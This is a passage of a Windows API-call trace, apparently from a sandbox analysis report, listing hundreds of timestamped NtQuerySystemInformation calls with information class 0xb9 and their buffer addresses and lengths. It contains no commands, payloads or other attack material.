(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0284.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0284.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x58, ResultLength=0x0) [0284.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0284.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0284.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0284.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0284.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0284.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0284.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0284.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x58, ResultLength=0x0) [0284.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0284.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0284.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0284.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0284.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0284.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0284.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0284.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0284.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x28, ResultLength=0x0) [0284.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x28, ResultLength=0x0) [0284.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0284.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0284.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0284.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x20, ResultLength=0x0) [0284.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x20, ResultLength=0x0) [0284.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x20, ResultLength=0x0) [0284.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0284.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0284.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0284.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0284.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0284.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0284.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0284.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0284.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0284.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0284.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0284.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0284.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0284.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0284.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff8, Length=0x50, ResultLength=0x0) [0284.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0284.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0284.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0284.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0284.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0284.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x28, ResultLength=0x0) [0284.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0284.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0284.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0284.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0284.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0284.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x20, ResultLength=0x0) [0284.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x20, ResultLength=0x0) [0284.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x20, ResultLength=0x0) [0284.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0284.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0284.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0284.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0284.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x50, ResultLength=0x0) [0284.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x38, ResultLength=0x0) [0284.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0284.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0284.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0284.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0284.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x28, ResultLength=0x0) [0284.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x38, ResultLength=0x0) [0284.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x28, ResultLength=0x0) [0284.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 